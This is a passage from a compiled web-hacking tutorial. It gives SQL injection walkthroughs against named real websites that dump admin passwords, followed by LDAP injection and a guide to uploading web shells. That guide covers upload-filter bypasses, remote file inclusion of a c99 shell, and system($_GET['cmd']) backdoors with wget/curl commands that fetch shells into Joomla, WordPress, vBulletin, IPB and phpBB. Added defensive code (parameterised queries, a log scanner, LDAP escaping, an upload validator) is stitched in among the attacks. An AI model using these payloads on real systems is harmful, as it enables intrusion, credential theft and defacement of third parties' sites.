http://www.site.com/index.php?id=-234' UNION SELECT
1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where
table_name=0x61646d696e--+
Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php
For this example, we'll use "username" and "password" as our column names
5. Obtaining Data from Column names
http://www.site.com/index.php?id=-234' UNION SELECT
1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+
6. Example :
1. http://www.onthegro.co.za/content.php?id=latest_news'
2. http://www.onthegro.co.za/content.php?id=latest_news' order by 1000 --+
3. http://www.onthegro.co.za/content.php?id=latest_news' order by 1 --+
4. http://www.onthegro.co.za/content.php?id=latest_news' order by 2 --+
5. http://www.onthegro.co.za/content.php?id=latest_news' order by 3 --+
6. http://www.onthegro.co.za/content.php?id=latest_news' order by 4 --+
7. http://www.onthegro.co.za/content.php?id=-latest_news' order by 1,2,3,4 --+
8. http://www.onthegro.co.za/content.php?id=-latest_news' order by
1,2,group_concat(schema_name,0x0a),4 from information_schema.schemata --+
9. http://www.onthegro.co.za/content.php?id=-latest_news' order by
1,2,group_concat(table_name,0x0a),4 from information_schema.tables where
table_schema=database()--+
10. http://www.onthegro.co.za/content.php?id=-latest_news' order by
1,2,group_concat(column_name,0x0a),4 from information_schema.columns where
table_name=0x61646d696e--+
11. http://www.onthegro.co.za/content.php?id=-latest_news' order by
1,2,group_concat(username,0x3a,password,0x0a),4 from admin--+
2. Sql injection Union based :
[1] Example
http://www.naukriguru.com
1. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 100
2. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 10
3. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 20
4. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 50
5. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 40
6. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 30
7. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 35
8. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 33
9. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 32
10. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 31
11. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
12. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
13. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
14. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
15. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
16. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
17. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
18. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
19. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.tables where table_schema = database()--
20. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.columns where table_name = 0x6e675f61646d696e--
21. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat(id,0x3a,loginid,0x3a,email,0x3a,password,0x3a,name,0x3a,type,0x3a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from ng_admin--
22. http://www.naukriguru.com/admin/
23. http://www.naukriguru.com/admin/index.php#
24. http://www.naukriguru.com/admin/add_industry.php
Xpath Injection :
Step 1: Inject --> +and extractvalue(rand(),concat(0x0a,version()))--
Eg:
http://www.viratcooker.com/recipe.php?ID=3+and%20extractvalue(rand(),/*!concat*/(0x0a,version()))--
msg: Could not query:XPATH syntax error: ' 5.5.32-cll'
=====================================================================
Step 2: [Find Tables] Inject --> +and extractvalue(rand(),concat(0x0a,(select
concat(0x3a,table_name) from information_schema.tables WHERE table_schema=database()
limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from
/*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :RecipeIngredients'
---------------------------------------------------------------------------------------------------------------------
Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from
/*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 1,1)))--+
msg: Could not query:XPATH syntax error: ' :SS_categories'
---------------------------------------------------------------------------------------------------------------------
Respectively :~ For 2,3,4,5,6,7,8.....
msg : Could not query:XPATH syntax error: ' :SS_ordered_carts'
Could not query:XPATH syntax error: ' :SS_orders'
Could not query:XPATH syntax error: ' :SS_products'
Could not query:XPATH syntax error: ' :SS_products2'
Could not query:XPATH syntax error: ' :SS_special_offers'
Could not query:XPATH syntax error: ' :categories'
Could not query:XPATH syntax error: ' :details'
Could not query:XPATH syntax error: ' :productrange'
Could not query:XPATH syntax error: ' :recipes'
Could not query:XPATH syntax error: ' :visitors'
=====================================================================
Note : Convert table name to HEX [String to hex conversion]
Eg : details : 64657461696c73 or 0x64657461696c73
=====================================================================
Step 3: [Finding Columns] Inject --> +and extractvalue(rand(),concat(0x0a,(select
concat(0x3a,column_name) from information_schema.columns WHERE
table_name=0x64657461696c73 limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,column_name) from
/*!information_schema.columns*/ /*!WHERE*/ /*!column_name=0x64657461696c73*/ limit
0,1)))--+
msg: Could not query:XPATH syntax error: ' :cust_firstname'
---------------------------------------------------------------------------------------------------------------------
Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...
Respectively :~ For 2,3,4,5,6,7,8.....
msg: Could not query:XPATH syntax error: ' :cust_lastname'
msg: Could not query:XPATH syntax error: ' :cust_country'
msg: Could not query:XPATH syntax error: ' :cust_zip'
msg: Could not query:XPATH syntax error: ' :cust_state'
msg: Could not query:XPATH syntax error: ' :cust_city
msg: Could not query:XPATH syntax error: ' :cust_address'
=====================================================================
Note : In case I got :
Table -> users
Columns -> Password & Email
So,
=====================================================================
Step 4: Fetching Details Inject ---> +and extractvalue(rand(),concat(0x0a,(select
concat(email,0x3a,password) from users limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(email,0x3a,password) from
/*!users*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :email:password'
=====================================================================
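Both the string/union technique above and the "Xpath Injection" section (which uses MySQL's extractvalue() so that the query result is returned inside the "XPATH syntax error" message) depend on two application defects: the parameter is pasted into the SQL text, and the database engine's error text is echoed to the client. The block below is an added example, not code from the original tutorial. Part 1 shows the tutorial's `content.php?id=` pattern next to the parameterised form; part 2 is an access-log scanner that flags the payload shapes used in both sections. The SQLite schema, rows and the log lines are constructed for this example.

```python
"""Added example (not part of the original tutorial): the defender's side of the
string/union-based and extractvalue() error-based injections shown above.
Part 1: a parameterised query treats the tutorial's payloads as plain data.
Part 2: a small access-log scanner that flags those payload shapes.
The schema, rows and log lines are constructed for this example."""
import re
import sqlite3
from typing import Iterable, Iterator, List, Tuple
from urllib.parse import unquote_plus

# --- Part 1: parameterised query vs string concatenation ---------------------

def make_db() -> sqlite3.Connection:
    """Constructed in-memory database standing in for the tutorial's site."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE content(id TEXT, body TEXT);
        INSERT INTO content VALUES ('latest_news', 'public news item');
        CREATE TABLE admin(username TEXT, password TEXT);
        INSERT INTO admin VALUES ('admin', 'hunter2');
    """)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, page_id: str) -> List[str]:
    """The content.php?id= pattern: the value is pasted into the SQL text and the
    engine's error is echoed back, which is exactly what error-based extraction needs."""
    sql = f"SELECT body FROM content WHERE id='{page_id}'"
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.OperationalError as exc:
        return [f"Could not query: {exc}"]


def lookup_safe(conn: sqlite3.Connection, page_id: str) -> List[str]:
    """Same query with a bound parameter: the quote and comment are part of the value,
    and any engine error would be logged server-side instead of returned."""
    return [row[0] for row in conn.execute("SELECT body FROM content WHERE id=?", (page_id,))]


# --- Part 2: log-line detector ------------------------------------------------

# Applied to the URL-decoded request path; each pattern mirrors one step of the tutorial.
SQLI_PATTERNS = {
    "order-by probe":             re.compile(r"\border\s+by\s+\d+\b", re.I),
    "union column dump":          re.compile(r"\bunion\s+(?:/\*!\s*)?select\b", re.I),
    "schema read":                re.compile(r"information_schema\.(?:schemata|tables|columns)", re.I),
    "error-based xpath":          re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I),
    "inline-comment obfuscation": re.compile(r"/\*!\s*\w+\s*\*/"),
}
COMBINED_LOG = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def classify_request(raw_path: str) -> List[str]:
    """Names of every pattern matching the decoded request path (+ and %xx decoded)."""
    decoded = unquote_plus(raw_path)
    return [name for name, rx in SQLI_PATTERNS.items() if rx.search(decoded)]


def scan_log(lines: Iterable[str]) -> Iterator[Tuple[str, str, List[str]]]:
    """Yield (client_ip, path, labels) for each flagged combined-format access-log line."""
    for line in lines:
        m = COMBINED_LOG.match(line)
        if not m:
            continue
        labels = classify_request(m.group(2))
        if labels:
            yield m.group(1), m.group(2), labels


# Constructed access-log lines: one normal request, then the three payload shapes.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Apr/2012:10:30:00 +0000] "GET /content.php?id=latest_news HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Apr/2012:10:30:05 +0000] "GET /content.php?id=latest_news%27%20order%20by%201000--+ HTTP/1.1" 500 120',
    '203.0.113.5 - - [01/Apr/2012:10:30:09 +0000] "GET /content.php?id=-latest_news%27%20UNION%20SELECT%201,2,group_concat(schema_name),4%20from%20information_schema.schemata--+ HTTP/1.1" 200 900',
    '203.0.113.5 - - [01/Apr/2012:10:31:00 +0000] "GET /recipe.php?ID=3+and%20extractvalue(rand(),/*!concat*/(0x0a,version()))-- HTTP/1.1" 500 210',
]

if __name__ == "__main__":
    conn = make_db()
    probe = "latest_news' order by 1000--"
    print("vulnerable:", lookup_vulnerable(conn, probe))   # echoes the engine's error
    print("safe:      ", lookup_safe(conn, probe))         # [] : no row has that literal id
    for ip, path, labels in scan_log(SAMPLE_LOG):
        print(f"{ip} {labels} {path}")
```

Two things to take from the run: the parameterised lookup returns an empty result for the probe instead of an error, so the "error shows, hence vulnerable" signal from the tutorial never appears; and the scanner labels each request by technique, which is more useful in triage than a single "SQLi" tag because the error-based and union-based families leave different traces in the application's own logs.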
LDAP injections :
---[ 0x01: Introduction ]
LDAP (Lightweight Directory Access Protocol) is a lightweight protocol for accessing the X.500
directory service. The protocol works over TCP/IP.
LDAP is used to query and modify the objects stored in the directory.
---[ 0x02: LDAP Filters ]
It is quite important to understand how LDAP filters work. Their syntax is defined in
RFC 4515 (6/2006) (http://tools.ietf.org/html/rfc4515):
Filter = ( filtercomp )
Filtercomp = and / or / not / item
And = & filterlist
Or = | filterlist
Not = ! filter
Filterlist = 1*filter
Item = simple / present / substring
Simple = attr filtertype assertionvalue
Filtertype = "=" /"~="/ ">=" / "<="
Present = attr = *
Substring = attr "=" [initial] * [final]
Initial = assertionvalue
Final = assertionvalue
Logical operators:
- AND "&"
- OR "|"
- NOT "!"
Relational operators:
<=, >=, =, ~=
The wildcard "*" is used to replace any run of characters.
Filter example:
(&(objectClass=user)(uid=*)): returns a list of all objects of
type user, no matter
which value the attribute "uid" takes.
---[ 0x02: LDAP injection in Web Applications ]
The LDAP injection technique is very similar to SQL injection.
The attack technique is used to exploit websites that build LDAP
filters directly from
data supplied by the user.
Vulnerable code with comments (by Sacha Faust):
+++++++++++++++++++++++++++++++++++++
line 0: <html>
line 1: <body>
line 2: <%@ Language=VBScript %>
line 3: <%
line 4: Dim userName
line 5: Dim filter
line 6: Dim ldapObj
line 7:
line 8: Const LDAP_SERVER = "ldap.example"
line 9:
line 10: userName = Request.QueryString("user")
line 11:
line 12: if( userName = "" ) then
line 13: Response.Write("<b>Invalid request. Please specify a valid user name</b><br>")
line 14: Response.End()
line 15: end if
line 16:
line 17:
line 18: filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry
line 19:
line 20:
line 21: 'Creating the LDAP object and setting the base dn
line 22: Set ldapObj = Server.CreateObject("IPWorksASP.LDAP")
line 23: ldapObj.ServerName = LDAP_SERVER
line 24: ldapObj.DN = "ou=people,dc=spilab,dc=com"
line 25:
line 26: 'Setting the search filter
line 27: ldapObj.SearchFilter = filter
line 28:
line 29: ldapObj.Search
line 30:
line 31: 'Showing the user information
line 32: While ldapObj.NextResult = 1
line 33: Response.Write("<p>")
line 34:
line 35: Response.Write("<b><u>User information for : " + ldapObj.AttrValue(0) + "</u></b><br>")
line 36: For i = 0 To ldapObj.AttrCount -1
line 37: Response.Write("<b>" + ldapObj.AttrType(i) + "</b> : " + ldapObj.AttrValue(i) + "<br>" )
line 38: Next
line 39: Response.Write("</p>")
line 40: Wend
line 41: %>
line 42: </body>
line 43: </html>
+++++++++++++++++++++++++++++++++++++
In line 10 note that the userName variable is initialized with the value
of the parameter user and then quickly validated to see if the
value is empty.
If the value is not empty, the variable userName is used to
initialize the
variable filter on line 18.
This new variable is used directly to build an LDAP search, to be
used in
the call to SearchFilter on line 27.
The attacker has full control over what will be queried on the
LDAP server.
You will get the result of the query when the code
reaches lines 32 to 40, where
all results and their attributes are displayed to the user.
Example 1:
http://website/ldap.asp?user=*
In this example the character "*" is sent in the
"user" parameter, which ends up
in the variable filter.
This LDAP filter will match any object that has an attribute
uid.
It shows all users and their information.
Example 2:
http://website/ldap.asp?user=ka0x)(|(homedirectory=*)
It will show us the home directory path of the user ka0x.
You can test these with the code shown above.
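The fix for line 18 is to escape the user-supplied value before it is placed inside the filter, so that `*`, `(`, `)`, `\` and NUL are matched literally rather than parsed as filter syntax. The block below is an added example, not code from the original advisory: it applies the RFC 4515 escaping rules to the two example payloads above and adds a shape check for the filter the page should always produce. The function names are this example's own; the `(uid=...)` filter shape is the page's.

```python
"""Added example (not from the original advisory): RFC 4515 escaping for values placed
inside an LDAP search filter, which is the fix for line 18 of the ldap.asp code above.
Function names are this example's own; the (uid=...) filter shape is the page's."""
from typing import Dict

# RFC 4515 section 3: inside an assertion value these characters must be written as a
# backslash followed by the two-digit hex code of the byte.
_LDAP_ESCAPES: Dict[str, str] = {
    "\\":   r"\5c",   # handled first so the escapes added below are not re-escaped
    "*":    r"\2a",
    "(":    r"\28",
    ")":    r"\29",
    "\x00": r"\00",
}


def escape_filter_value(value: str) -> str:
    """Escape one assertion value so it matches literally, never as filter syntax."""
    out = value.replace("\\", _LDAP_ESCAPES["\\"])
    for ch, esc in _LDAP_ESCAPES.items():
        if ch != "\\":
            out = out.replace(ch, esc)
    return out


def build_user_filter(user_name: str) -> str:
    """Hardened version of line 18:  filter = "(uid=" + CStr(userName) + ")"  """
    if user_name == "":
        raise ValueError("user name is required")
    return f"(uid={escape_filter_value(user_name)})"


def is_single_assertion(filter_text: str) -> bool:
    """True when the filter is exactly one (attr op value) component with no unescaped
    '(' or ')' inside it: the only shape the ldap.asp code should ever send. Useful as
    a last-line check or a log rule where the escaping cannot be enforced at the source."""
    if not (filter_text.startswith("(") and filter_text.endswith(")")):
        return False
    body = filter_text[1:-1]
    i = 0
    while i < len(body):
        if body[i] == "\\":
            i += 3          # skip an RFC 4515 \xx escape sequence
            continue
        if body[i] in "()":
            return False
        i += 1
    return True


if __name__ == "__main__":
    # The two payloads from the examples above, next to an ordinary user name.
    for raw in ["ka0x", "*", "ka0x)(|(homedirectory=*)"]:
        unsafe = f"(uid={raw})"
        safe = build_user_filter(raw)
        print(f"{raw!r:30} unsafe={unsafe!r:40} single={is_single_assertion(unsafe)}")
        print(f"{'':30} safe  ={safe!r:40} single={is_single_assertion(safe)}")
```

With escaping in place, Example 1 becomes `(uid=\2a)`, a search for a user literally named `*`, and Example 2 becomes a single `(uid=...)` assertion whose value happens to contain parentheses; neither reaches the directory as a second filter component. The `is_single_assertion` check is intentionally narrow: it only knows the one shape this page's code emits, which is what makes it cheap to apply as a detection rule on outgoing filters.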
---[ 0x03: Links ]
http://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol
http://es.wikipedia.org/wiki/LDAP
http://www.ldapman.org/
__EOF__
# milw0rm.com [2007-11-04]
© Offensive Security 2011
Part 2
Web server Hacking
Using the vulnerabilities above, various types of hacks can be used to hack a web
server.
Guide content:
• Shell Uploading Guide
• Shell uploading through php-my-admin
• Shell Jumping
• Symlink Bypass 2013 for Linux Servers
• Hack Web-DAV & Deface
• Root server without local root exploit
• LINUX SERVER ROOTING Tutorial
• Cpanel Cracking
• Bypass 403 Forbidden And Cant Read /Etc/Named.Config Error
• Backdoor a WEB SERVERS WITH WEBACOO
• Web Server Hacking through Command Injection
• How To Hack Windows Servers Using Dubrute 2.2
• Symlink Tutorial for beginners
• MASS DEFACE TUTORIAL
• How to hack a websites using Symlink Bypassing
• ATTACKING WEBSERVERS VIA .HTACCESS
• How to Back-connect with netcat
• Hacking Cold Fusion Servers - Part I
• Hacking Cold Fusion Servers - Part II
So let's get started !
1. Shell Uploading Guide
Many newbies face problems while uploading a shell on a site after getting admin access / logging
in to that site. So I am writing this in order to help them. Basically a shell gives us remote access
to that server. Such shells are available in different languages like php, asp/aspx, cgi etc. So we
have to choose a shell that will work on the server according to the server script. If the server
supports php then we have to choose a php shell, otherwise asp or cgi. Now let's
come to the main point: after logging in to the site, if we find any
upload option in the site, then we can easily upload a shell. But
sometimes we have to make some changes to upload a shell.
Way 1
As the shell is in PHP format, sometimes some sites do not allow
uploading such scripts directly with the .php extension. If that happens then
just rename the shell. Add .gif/.jpg/.html/.doc etc. Example: suppose before renaming the
shell name was shell.php; then we will rename it as shell.php.jpg or anything else.
Way 2
Upload a simple uploader shell first that isn't detected by antivirus and firewalls. Then
upload your shell through your own shell. You can download an
uploader shell from here.
Way 3
A few server firewalls detect the shell script by checking the
headers & don't allow us to upload a shell. So we can bypass it by using the "GIF89a shell
script bypass" method. Open your shell in notepad and add "GIF89a;" without quotes before the
shell code starts, like below:
GIF89a;
Depending on what kind of file validation they are using, this may fool the server into thinking
it's an image, since when it reads the file it finds the GIF header and assumes it's safe since it's an
image.
Way 4
This method is more advanced. This only works for client side filters rather than server side.
Download Firebug for Firefox, then edit the HTML of the upload form:
<form enctype="multipart/form-data" action="uploader.php" method="POST">
Upload DRP File: <input name="Upload Saved Replay" type="file" accept="*.jpg"/><br />
<input type="submit" value="Upload File" />
</form>
Change the accept filter to *.* or just remove it completely; it will then let you upload any type
of file.
Way 5
Download the "Live HTTP Headers" addon first for your Firefox browser.
1. Rename your shell to shell.php.jpg (or whatever that site supports. In my case, the site
supports only jpg files. That's why I renamed it to shell.php.jpg.)
2. Open Firefox & start your Live HTTP Headers addon, after that upload your shell.
3. Then your Live HTTP Headers will look something similar to this
4. Then click on the shell.php.jpg, after that click on the Replay button.
5. Then again a new window will open; in that window there will be two boxes, but we have to
work on the second box.
6. In the second box, rename your shell.php.jpg to shell.php, then again click on the Replay button.
Way 6
Find yourself a copy of edjpgcom.exe ("edjpgcom is a free Windows application that allows you
to change (or add) a JPEG comment in a JPEG file."). Usage: edjpgcom "filename.jpg". Now
add this to the jpg comment, since you won't be able to drop a whole shell in there due to size limits
etc.:
"; system($_GET['cmd']); echo ?>
Now rename your jpg to .php and upload.
Way 7
Another way you can fool the web server into thinking you're uploading an image instead of a php shell is to
get Firefox and install the "Tamper Data" add-on, then click Start Tamper and upload your php shell, then
tamper the data and change the Content-Type from 'application/octet-stream' to 'image/jpeg'. If you have any
problem uploading a shell using Tamper Data, then just do a simple Google search. Many video tutorials
on this are available on the web, so I am not explaining this step by step.
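Every one of Ways 1 through 7 works against the same weak check: the server trusts something the client chose (the file name, the browser's Content-Type, the client-side `accept=` filter, or a leading `GIF89a;` header). The validator below is an added example, not code from the original guide: it ignores the client-supplied Content-Type, requires the last extension to be an allowed image type, rejects double extensions such as `shell.php.jpg`, requires the file's magic bytes to match that extension, refuses image data that contains a PHP open tag, and stores the file under a server-chosen random name. The sample uploads are constructed for this example and the allow-list is this example's own policy.

```python
"""Added example (not from the original guide): a server-side upload check that defeats
Ways 1, 3, 4, 5 and 7 above. It ignores the browser-supplied Content-Type and the
client-side accept= filter, requires the *last* extension to be an allowed image type,
rejects double extensions such as shell.php.jpg, requires the file's magic bytes to
match that extension, and refuses files that contain a PHP open tag after the header.
The sample uploads are constructed; the allow-list is this example's policy."""
import os
import re
import secrets
from typing import Dict, Tuple

# extension -> accepted magic-byte prefixes
ALLOWED: Dict[str, Tuple[bytes, ...]] = {
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "gif":  (b"GIF87a", b"GIF89a"),
}
# extensions that a permissive handler configuration may execute if they appear anywhere
# in the name (shell.php.jpg)
EXECUTABLE = {"php", "phtml", "php3", "php4", "php5", "phar", "asp", "aspx", "cgi", "pl", "jsp"}
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


def check_upload(filename: str, content: bytes, client_content_type: str) -> Tuple[bool, str]:
    """Return (accepted, reason). client_content_type is deliberately not used for the
    decision: it is attacker-controlled (Way 7) and is only reported."""
    base = os.path.basename(filename)            # drop any path component the client sent
    parts = base.lower().split(".")
    if len(parts) < 2 or parts[0] == "":
        return False, "no extension"
    ext = parts[-1]
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed"
    if any(seg in EXECUTABLE for seg in parts[1:-1]):
        return False, f"double extension {base.lower()} rejected"
    if not any(content.startswith(magic) for magic in ALLOWED[ext]):
        return False, f"content does not start with a {ext} signature"
    if PHP_OPEN_TAG.search(content):
        return False, "php tag inside image data"
    return True, f"ok (client said {client_content_type!r}; not trusted)"


def storage_name(ext: str) -> str:
    """Server-chosen name: random, fixed extension, no user influence over the path.
    Store it outside the web root or in a directory with script execution disabled."""
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed uploads, one per technique from the guide, plus a genuine GIF.
SAMPLES: Dict[str, Tuple[str, bytes, str]] = {
    "way1_double_ext":    ("shell.php.jpg", b"\xff\xd8\xff\xe0<?php echo 'x'; ?>", "image/jpeg"),
    "way3_gif89a":        ("shell.php",     b"GIF89a;<?php echo 'x'; ?>",           "image/gif"),
    "way4_client_filter": ("shell.php",     b"<?php echo 'x'; ?>",                  "application/octet-stream"),
    "way7_content_type":  ("shell.php",     b"<?php echo 'x'; ?>",                  "image/jpeg"),
    "polyglot_jpg":       ("photo.jpg",     b"\xff\xd8\xff\xe0" + b"\x00" * 8 + b"<?php echo 'x'; ?>", "image/jpeg"),
    "real_gif":           ("avatar.gif",    b"GIF89a\x01\x00\x01\x00\x80\x00\x00", "image/gif"),
}

if __name__ == "__main__":
    for label, (name, data, ctype) in SAMPLES.items():
        ok, why = check_upload(name, data, ctype)
        stored = storage_name(name.rsplit(".", 1)[-1]) if ok else "-"
        print(f"{label:20} {'ACCEPT' if ok else 'REJECT':6} {why:45} {stored}")
```

Way 6 (a PHP fragment inside a JPEG comment, renamed to .php) is rejected by the extension rule alone; the magic-byte and tag checks exist for the case where the file keeps a valid image name and the web server is later misconfigured to execute images. The random storage name also removes the "File Access" step that the CSRF upload PoCs in Part 1 rely on, since the attacker can no longer predict the path.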
Way 8
All the above mentioned ways work when we find an upload button on the site. But when there is no upload
button, it's not easy to upload a shell there. We can try a few things. We have to find out if there is an
edit option for an existing php/asp/aspx page. If there is an edit option then open that page & delete the whole
script. After that, open your shell in notepad, copy the script and paste it into that page. Finally, save it. Now that
link will be your shell. Possibly we can find an edit option in the following pages of a site:
Contact us.php / Contact us.asp
Class.php / Class.asp
About us.php / about us.asp
Terms.php / terms.asp
NB: some news, vehicle selling, cart etc. sites don't have any option to upload a file after logging in
through the admin panel. They only allow file upload after logging in through cPanel.
Way 9
Sometimes, in some Remote File Inclusion vulnerable sites, we have to execute
a shell from another hosting site. Method:
1) Upload your shell to a free hosting site like www.my3gb.com, www.3owl.com,
www.ripway.com, www.000webhost.com, etc.
2) Now suppose your shell link is www.example.my3gb.com/c99.txt & your vulnerable
site is www.site.com
3) Now we have to execute the following command to gain shell access to that site:
http://www.site.com/v2/index.php?page=http://www.example.my3gb.com/c99.txt
4) Replace the site link in the command according to your shell &
vulnerable site link.
SHELL UPLOADING IN joomla, wp, vb, smf, ipb, mybb SITES
IN THOSE ABOVE MENTIONED SITE WE CANT FIND DIRECT UPLOAD OPTION
GENERALLY. SO WE HAVE TO DO THEM IN OTHER WAYS.
1.Joomla Site:
After Login into adminpanel u will find Extensions on 5th No. expand this click on it > template Manager
> check on any template (like beez,ja_purity) Now click on Edit (right upper side) after this click on Edit
html now paste ur shell code and click save...done site.com/templates/template name/index.php like
site.com/templates/beez/index.php
2.Wordpress:
login into admin panel expand Appearance then click on editor > u will find style.css
now select 404.php on right side paste ur shell code and click edit file u can find
shell in site.com/wp-content/themes/theme name u edit/404.php
3.Vbulletin:
1-Log in to the admin CP
2-Under "Plugins & Products", select Add New Plugin
3-Adjust the settings as follows: Product: vBulletin; Hook Location: global_start; Title: (anything); Execution Order: 5; Code:
ob_start(); system($_GET['cmd']); $execcode = ob_get_contents(); ob_end_clean();
Plugin is Active: Yes
4-After the plugin is added, go to the heading "Style and Design" and select "Style Manager"
5-Under whatever the default style is in the dropdown menu, select Edit Templates.
6-Scroll to the FORUMHOME templates and expand them. Click [Customize] beside FORUMHOME.
7-Search for this code somewhere near the top:
$header
Replace it with:
$header $execcode
8-Now go to the forum and add the following after index.php:
?cmd=wget http://www.site.com/shell.txt;mv shell.txt shell.php
So it looks like:
http://www.site.com/pathtoforum/index.php?cmd=wget http://www.site.com/shell.txt;mv shell.txt shell.php
What this does is download shell.txt and rename it to shell.php. Now the shell should be located at shell.php in the forum directory. If not, then wget is disabled on that server and you can try alternative methods:
http://www.site.com/pathtoforum/index.php?cmd=curl http://www.site.com/shell.txt > shell.php
http://www.site.com/pathtoforum/index.php?cmd=GET http://www.site.com/shell.txt shell.php
4.SMF:
Log into the admin panel. You need to download any SMF theme in zip format, put your shell.php in it and save it. Then in the admin panel select Themes and Layout > Install a new theme > browse and upload the theme that has our shell.php :) After upload, the shell will be found at site.com/Themes/theme name/shell.php
5.IPB:
Log into the admin panel > Look and Feel > Manage Languages, choose a language > section (example) public_help, edit help.txt. Choose a topic from the list, or search for a topic. In the right box add the code below:
${${print $query='cd cache; wget http://link_to_shell/shell.txt;mv shell.txt shell.php'}} ${${system($query,$out)}}
${${print $out}}
When you have added it, click Go at the bottom. Now we go to
http://www.site.com/index.php?app=core&module=help and the code we added will be executed, and you will get your shell at www.site.com/cache/shell.php
6.phpBB
Log into the admin panel > go to Styles -> Templates -> Edit, and for Template file choose faq_body.html. At the bottom of:
We add:
fwrite(fopen($_GET[o], 'w'), file_get_contents($_GET[i]));
And save it. Now go to:
www.site.com/forum/faq.php?o=shell.php&i=http://link_to_shell.com/shell.txt
The shell will be found at site path/shell.php
7.MyBB:
Log into the forum admin CP > go to Templates and Styles, and find what the default MyBB theme is. Then go to Templates and expand the templates that are used by the current theme. Find Calendar templates and click it. Click 'calendar'. Above all the HTML code, paste this: http://pastebin.com/nA3asuNz
Save :) The shell will be found at site.com/calendar.php
Note: if you get an error like "code is danger unable to edit" then simply paste your deface code to deface calendar.php
Tutorial: shell uploading through phpMyAdmin
Requirements:
- You must have the full path
- pma & MySQL db privileges.
It's not every day you get to use this, it's rare, but today I exploited a site by this so I thought of writing a tutorial. OK then, let's start.
First log in to MySQL,
now click 'Show MySQL system variables',
then 'SQL'.
Now you can run SQL commands, like create a db, delete tables or whatever. We want to upload a shell, so let's move on to it.
Now we will create a command line into a new file, with SELECT ... INTO OUTFILE:
